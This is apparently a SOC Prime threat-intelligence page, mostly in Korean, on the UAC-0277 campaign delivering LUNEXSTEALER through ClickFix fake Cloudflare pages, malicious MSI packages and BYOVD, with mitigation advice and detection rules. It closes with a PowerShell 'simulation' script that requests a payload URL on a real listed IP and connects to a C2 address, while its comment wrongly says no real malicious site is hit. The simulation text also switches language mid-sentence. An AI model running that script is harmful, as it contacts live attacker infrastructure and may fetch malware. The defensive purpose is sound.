SOC Prime Bias: High

06 Oct 2026 14:30 UTC

UAC-0277 공격, 악성 MSI 및 ClickFix 통해 LUNEXSTEALER 전달

Author Photo
SOC Prime Team linkedin icon 팔로우
UAC-0277 공격, 악성 MSI 및 ClickFix 통해 LUNEXSTEALER 전달
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

UAC-0277로 추적되는 위협 행위자들이 합법적인 웹사이트를 손상시켜 악성 JavaScript를 주입하고, 이를 통해 사용자를 속여 가짜 Cloudflare 검증 페이지를 통해 명령어를 실행하게 하고 있습니다. 이 ClickFix 기법은 최종적으로 LUNEXSTEALER 또는 BYOVD를 활용해 보안 통제를 피하는 추가 로더를 포함한 MSI 패키지를 전달합니다. 이 캠페인은 또한 Polygon과 Ethereum에서 블록체인 기반의 명령 및 제어 인프라를 사용하여 공격자 자원을 동적으로 관리합니다.

조사

CERT-UA는 100개 이상의 손상된 웹사이트를 식별하고 캠페인과 관련된 세 가지 MSI 변형을 분석했습니다. 연구자들은 FnHotkeyUtility.exe를 통한 DLL 사이드 로딩과 Windows Defender 보호를 우회하기 위한 취약한 AMD PDFWKRNL.sys 드라이버의 악용을 관찰했습니다. 조사 과정에서 데이터 수집 및 유출을 위해 사용되는 LUNARAXE 브라우저 확장과 NAIVEMESS PowerShell 컴포넌트를 발견했습니다.

완화

관리자는 그룹 정책을 통해 실행 대화상자(Win+R)에 대한 접근을 제한하고 MSI 설치 권한을 허가된 사용자로만 제한해야 합니다. Microsoft 취약 드라이버 차단 목록을 활성화하는 것은 BYOVD 공격의 위험을 줄이는 데 필수적입니다. 조직은 브라우저 확장 허용 목록을 시행하고 원격 URL이 포함된 msiexec.exe 명령줄 활동을 모니터링해야 합니다.

대응

의심스러운 MSI 실행 또는 승인되지 않은 브라우저 확장이 감지되면, 영향을 받는 호스트를 격리하고 LUNEXSTEALER와 관련된 프로세스를 종료하십시오. psychedelicloveUtils라는 이름의 예약 작업을 검토하고 Microsoft Office Word Editor 확장에 대한 브라우저 프로필을 검사하십시오. 캠페인과 관련된 가짜 Cloudflare 검증 페이지가 식별되면 CERT-UA에 보고해야 합니다.

공격 흐름

탐지

LOLBin 의미를 가진 의심스러운 RunMRU 항목 (via registry_event)

SOC Prime 팀
2026년 10월 5일

원격 MSI 파일 설치 시도 가능성 (cmdline 사용)

SOC Prime 팀
2026년 10월 5일

의심스러운 예약 작업 (audit 사용)

SOC Prime 팀
2026년 10월 5일

의심스러운 파일 다운로드 직접 IP (proxy 사용)

SOC Prime 팀
2026년 10월 5일

비정상적인 최상위 도메인(TLD) DNS 요청에 의한 의심스러운 명령 및 제어 (dns 사용)

SOC Prime 팀
2026년 10월 5일

악성 MSI 배포: ClickFix 기법 및 LUNEXSTEALER 악성코드 감지용 IOCs (HashSha256): UAC-0277 캠페인 2부

SOC Prime AI 규칙
2026년 10월 6일

악성 MSI 배포: ClickFix 기법 및 LUNEXSTEALER 악성코드 감지용 IOCs (HashSha256): UAC-0277 캠페인 1부

SOC Prime AI 규칙
2026년 10월 6일

악성 MSI 배포: ClickFix 기법 및 LUNEXSTEALER 악성코드 감지용 IOCs (HashMd5): UAC-0277 캠페인 2부

SOC Prime AI 규칙
2026년 10월 6일

악성 MSI 배포: ClickFix 기법 및 LUNEXSTEALER 악성코드 감지용 IOCs (HashMd5): UAC-0277 캠페인 1부

SOC Prime AI 규칙
2026년 10월 6일

악성 MSI 배포: ClickFix 기법 및 LUNEXSTEALER 악성코드 감지용 IOCs (SourceIP): UAC-0277 캠페인

SOC Prime AI 규칙
2026년 10월 6일

악성 MSI 배포: ClickFix 기법 및 LUNEXSTEALER 악성코드 감지용 IOCs (DestinationIP): UAC-0277 캠페인

SOC Prime AI 규칙
2026년 10월 6일

HTTP 및 WebSocket을 사용하는 악성 C2 서버와의 상호작용 감지 [Windows 네트워크 연결]

SOC Prime AI 규칙
2026년 10월 6일

DLL 사이드 로딩을 통한 FnHotkeyUtility 악성 spkvol.dll 실행 [Windows Sysmon]

SOC Prime AI 규칙
2026년 10월 6일

Msiexec 및 취약성 악용을 사용한 악성 MSI 패키지 다운로드 [Windows 프로세스 생성]

SOC Prime AI 규칙
2026년 10월 6일

손상된 웹사이트에서 악성 JavaScript 감지 [웹서버]

SOC Prime AI 규칙
2026년 10월 6일

시뮬레이션 실행

  • 공격 내러티브 및 명령어: 공격자는 드라이브 단순화 공격을 성공적으로 수행했습니다. 지속성을 확보하고 다음 단계의 악성코드를 다운로드하기 위해, 심어진 에이전트는 psychedeliclove.exe from a specific URI. Simultaneously, the agent attempts to beacon out to a secondary C2 node located at 193.178.159.128 on port 8080 to receive instructions via a WebSocket-like HTTP connection. These specific indicators are intended to trigger the existing proxy-based detection rules.

  • Regression Test Script:

    # Simulation Script for Detection Validation
    # Purpose: Trigger the specific URL and IP/Port indicators in the detection rule.
    
    Write-Host "[*] Starting Simulation..." -ForegroundColor Cyan
    
    # 1. Trigger Selection 1: Malicious URL Pattern
    Write-Host "[*] Attempting to access malicious URL pattern..." -ForegroundColor Yellow
    try {
        # We use a non-existent local listener or a fake URL to ensure we don't actually hit a real malicious site, 
        # but the proxy should still log the request attempt.
        Invoke-WebRequest -Uri "http://107.175.82.242:9000/wilow/psychedeliclove.exe" -ErrorAction SilentlyContinue
    } catch {
        Write-Host "[!] Request failed (expected), but telemetry should be generated." -ForegroundColor Gray
    }
    
    # 2. Trigger Selection 2: Specific IP and Port
    Write-Host "[*] Attempting to connect to C2 IP on port 8080..." -ForegroundColor Yellow
    try {
        $client = New-Object System.Net.Sockets.TcpClient
        $client.Connect("193.178.159.128", 8080)
        $client.Close()
    } catch {
        Write-Host "[!] Connection failed (expected), but proxy logs should capture the attempt." -ForegroundColor Gray
    }
    
    Write-Host "[*] Simulation Complete." -ForegroundColor Cyan
  • Cleanup Commands:

    # No persistent files are created by this simulation.
    # Only temporary network connections are attempted.
    Write-Host "[*] Cleanup complete. No artifacts left on system." -ForegroundColor Green